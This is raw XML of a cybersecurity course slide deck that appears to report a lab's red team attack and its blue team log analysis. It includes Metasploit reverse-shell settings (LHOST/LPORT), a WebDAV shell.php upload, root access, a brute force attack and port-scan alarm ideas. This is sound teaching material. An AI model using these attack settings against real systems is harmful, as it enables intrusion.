                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>-set LHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>192.168.1.105</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" dirty="0" smtClean="0"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-CA" sz="1200" dirty="0"/>
              <a:t>set LPORT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" dirty="0" smtClean="0"/>
              <a:t>3280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35" name="Google Shape;1135;p63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136" name="Google Shape;1136;p6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 dirty="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37" name="Google Shape;1137;p6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138" name="Google Shape;1138;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1139" name="Google Shape;1139;p6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 dirty="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40" name="Google Shape;1140;p6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141" name="Google Shape;1141;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="1480575"/>
            <a:ext cx="2428500" cy="31542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42" name="Google Shape;1142;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="2428500" cy="31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sz="1200" b="1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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>What did the exploit achieve? For example: Did it grant you a user shell, root access, etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>.?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>a victim's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>computer, get root access.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1143" name="Google Shape;1143;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1144" name="Google Shape;1144;p6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 dirty="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45" name="Google Shape;1145;p6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146" name="Google Shape;1146;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1481325"/>
            <a:ext cx="2428500" cy="32523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47" name="Google Shape;1147;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481374"/>
            <a:ext cx="2371500" cy="32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[INSERT: screenshot or command output illustrating the exploit.]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1334" y="2270861"/>
            <a:ext cx="2326615" cy="225875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2" name="Google Shape;1152;p6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153" name="Google Shape;1153;p64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1687275"/>
            <a:ext cx="8595300" cy="88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Blue Team</a:t>
            </a:r>
            <a:endParaRPr b="1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Log Analysis and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="34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Attack Characterization</a:t>
            </a:r>
            <a:endParaRPr sz="3400" dirty="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54" name="Google Shape;1154;p64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11</a:t>
            </a:fld>
            <a:endParaRPr sz="6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6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Identifying the Port Scan</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1160" name="Google Shape;1160;p6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4114800" cy="12696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Answer the following questions in bullet points under the screenshot if space allows. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Otherwise, add the answers to speaker notes. </a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/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endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1161" name="Google Shape;1161;p6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r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Volodymyr Dudar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63" name="Google Shape;1163;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3699913" y="609364"/>
            <a:ext cx="4911000" cy="9717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320040" lvl="0" indent="-16764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000" dirty="0"/>
              <a:t>What time did the port scan occur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" smtClean="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" smtClean="0"/>
              <a:t>20:00</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-16764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000" dirty="0"/>
              <a:t>How many packets were sent, and from which IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" smtClean="0"/>
              <a:t>? 1035 packets, from 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-16764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000" dirty="0"/>
              <a:t>What indicates that this was a port scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" smtClean="0"/>
              <a:t>? Connection over time (packet flow) discovered the first attemp on port scan</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1164" name="Google Shape;1164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1300" y="835137"/>
            <a:ext cx="424701" cy="33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446" y="1580735"/>
            <a:ext cx="4440014" cy="224430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7460" y="1580735"/>
            <a:ext cx="4408919" cy="2234311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9040" y="1481849"/>
            <a:ext cx="5184825" cy="1982115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1169" name="Google Shape;1169;p6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Finding the Request for the Hidden Directory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1170" name="Google Shape;1170;p6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4114800" cy="12696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Answer the following questions in bullet points under the screenshot if space allows. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Otherwise, add the answers to speaker notes. </a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/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endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171" name="Google Shape;1171;p6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r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Volodymyr Dudar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73" name="Google Shape;1173;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3638827" y="595965"/>
            <a:ext cx="5791200" cy="9717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320040" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>What time did the request occur? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1000" dirty="0" smtClean="0"/>
              <a:t>20:20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" smtClean="0"/>
              <a:t>How </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>many requests were made? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" smtClean="0"/>
              <a:t>1 request, 4 Hits (total)</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>Which files were requested? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1000" dirty="0"/>
              <a:t>GET /company_folders/secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1000" dirty="0" smtClean="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-16764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000" dirty="0" smtClean="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>did they contain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" smtClean="0"/>
              <a:t>? Connect_to_corp_server, with instructions to accessing Admin Ryan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" smtClean="0"/>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1000" dirty="0" smtClean="0"/>
              <a:t> and full </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" smtClean="0"/>
              <a:t>hash key for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" smtClean="0"/>
              <a:t>Ryans password.</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1174" name="Google Shape;1174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61300" y="835137"/>
            <a:ext cx="424701" cy="33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912" y="1481849"/>
            <a:ext cx="5184821" cy="198211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5007" y="2703082"/>
            <a:ext cx="3481987" cy="1889703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9" name="Google Shape;1179;p6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Uncovering the Brute Force Attack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1180" name="Google Shape;1180;p6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4114800" cy="12696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Answer the following questions in bullet points under the screenshot if space allows. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Otherwise, add the answers to speaker notes. </a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/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endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1181" name="Google Shape;1181;p6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r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Volodymyr Dudar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83" name="Google Shape;1183;p67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3663050" y="741300"/>
            <a:ext cx="5791200" cy="9717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320040" lvl="0" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>How many requests were made in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" smtClean="0"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>? 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" smtClean="0"/>
              <a:t>17388 Hits (total)</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>How many requests had been made before the attacker </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>discovered the password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" smtClean="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1000" dirty="0"/>
              <a:t>, 4 Hits (total</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1184" name="Google Shape;1184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1300" y="835137"/>
            <a:ext cx="424701" cy="33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018" y="1417055"/>
            <a:ext cx="6459264" cy="3270002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6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Finding the WebDAV Connection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1190" name="Google Shape;1190;p6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4114800" cy="12696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Answer the following questions in bullet points under the screenshot if space allows. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Otherwise, add the answers to speaker notes. </a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/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endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1191" name="Google Shape;1191;p6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r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Volodymyr Dudar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93" name="Google Shape;1193;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3628077" y="557288"/>
            <a:ext cx="5791200" cy="9717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320040" lvl="0" indent="-16764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000" dirty="0"/>
              <a:t>How many requests were made to this directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" smtClean="0"/>
              <a:t>? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" smtClean="0"/>
              <a:t>1, 110(total) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" smtClean="0"/>
              <a:t>for WebDAV, 94 for shell.php</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640">
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>Which files were requested</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" smtClean="0"/>
              <a:t>? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0">
              <a:buSzPts val="1200"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1000" dirty="0" smtClean="0"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1000" dirty="0"/>
              <a:t>/webdav/shell.php: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1000" dirty="0" smtClean="0"/>
              <a:t>HTTP Query </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1194" name="Google Shape;1194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1300" y="835137"/>
            <a:ext cx="424701" cy="33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592" y="1634083"/>
            <a:ext cx="4065438" cy="115726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7030" y="1634083"/>
            <a:ext cx="4615126" cy="115378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592" y="2791351"/>
            <a:ext cx="4059577" cy="115253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1168" y="2791351"/>
            <a:ext cx="4620987" cy="1143213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9" name="Google Shape;1199;p6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200" name="Google Shape;1200;p69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1631275"/>
            <a:ext cx="8595300" cy="202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Blue Team</a:t>
            </a:r>
            <a:endParaRPr b="1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Proposed Alarms and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="34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Mitigation Strategies</a:t>
            </a:r>
            <a:endParaRPr sz="3400" dirty="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01" name="Google Shape;1201;p69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16</a:t>
            </a:fld>
            <a:endParaRPr sz="6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7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Blocking the Port Scan</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1207" name="Google Shape;1207;p7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r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Volodymyr Dudar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08" name="Google Shape;1208;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="30513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lvl="0"/>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>What kind of alarm can be set to detect future port scans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0" smtClean="0"/>
              <a:t>? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>Set alert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>when an external source hits more than 25 unique ports on the firewall, with the goal being to detect port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>scans.</a:t>
            </a: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What threshold would you set to activate this alarm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0" smtClean="0"/>
              <a:t>?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/>
              <a:t>25 over 5 minutes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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209" name="Google Shape;1209;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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lvl="0"/>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>What configurations can be set on the host to mitigate port scans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0" smtClean="0"/>
              <a:t>? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1000" dirty="0" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" smtClean="0"/>
              <a:t>onfiguration could be made by b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>locking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> echo requests for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>. </a:t>
            </a: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" sz="140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"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dirty="0" smtClean="0"/>
              <a:t>Describe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>the solution. If possible, provide required command lines. </a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> sends an ICMP type 8 (echo request) packet to the target IP addresses, expecting a type 0 (echo reply) in return from available hosts.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4" name="Google Shape;1214;p7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Finding the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1215" name="Google Shape;1215;p71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r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Volodymyr Dudar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16" name="Google Shape;1216;p71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2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kind of alarm can be set to detect future unauthorized access?</a:t>
            </a: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What threshold would you set to activate this alarm?</a:t>
            </a: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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1217" name="Google Shape;1217;p71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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What configuration can be set on the host to block unwanted access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0" smtClean="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:endParaRPr lang="en"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 smtClean="0"/>
              <a:t>Close port 80 web service</a:t>
            </a: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dirty="0"/>
              <a:t>Describe the solution. If possible, provide required command lines. </a:t>
            </a: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" name="Google Shape;1222;p7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Preventing Brute Force Attacks</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1223" name="Google Shape;1223;p72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r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Volodymyr Dudar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24" name="Google Shape;1224;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2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kind of alarm can be set to detect future brute force attacks?</a:t>
            </a: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What threshold would you set to activate this alarm?</a:t>
            </a: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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1225" name="Google Shape;1225;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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configuration can be set on the host to block brute force attacks?</a:t>
            </a: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Describe the solution. If possible, provide the required command line(s). </a:t>
            </a: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5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dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Table of Contents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25" name="Google Shape;1025;p5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This document contains the following sections:</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1026" name="Google Shape;1026;p5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r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Volodymyr Dudar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27" name="Google Shape;1027;p55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028" name="Google Shape;1028;p55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029" name="Google Shape;1029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 dirty="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0" name="Google Shape;1030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031" name="Google Shape;1031;p55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032" name="Google Shape;1032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 dirty="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3" name="Google Shape;1033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034" name="Google Shape;1034;p55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035" name="Google Shape;1035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3D85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 dirty="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6" name="Google Shape;1036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3D85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037" name="Google Shape;1037;p55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038" name="Google Shape;1038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 dirty="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9" name="Google Shape;1039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040" name="Google Shape;1040;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12450" y="13788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Network Topology</a:t>
            </a:r>
            <a:endParaRPr sz="1800"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1" name="Google Shape;1041;p55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42" name="Google Shape;1042;p55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43" name="Google Shape;1043;p55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44" name="Google Shape;1044;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-124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Red Team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Security Assessment</a:t>
            </a:r>
            <a:endParaRPr sz="18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5" name="Google Shape;1045;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15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Blue Team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Log Analysis and Attack Characterization</a:t>
            </a:r>
            <a:endParaRPr sz="18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6" name="Google Shape;1046;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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Hardening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Proposed Alarms and Mitigation Strategies</a:t>
            </a:r>
            <a:endParaRPr sz="18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Google Shape;1230;p7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Detecting the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1231" name="Google Shape;1231;p73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r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Volodymyr Dudar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32" name="Google Shape;1232;p73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2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kind of alarm can be set to detect future access to this directory?</a:t>
            </a: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What threshold would you set to activate this alarm?</a:t>
            </a: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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1233" name="Google Shape;1233;p73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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configuration can be set on the host to control access?</a:t>
            </a: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Describe the solution. If possible, provide the required command line(s). </a:t>
            </a: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7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Identifying Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1239" name="Google Shape;1239;p7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r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Volodymyr Dudar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40" name="Google Shape;1240;p74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2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kind of alarm can be set to detect future file uploads?</a:t>
            </a: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What threshold would you set to activate this alarm?</a:t>
            </a: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  <p:sp>
        <p:nvSpPr>
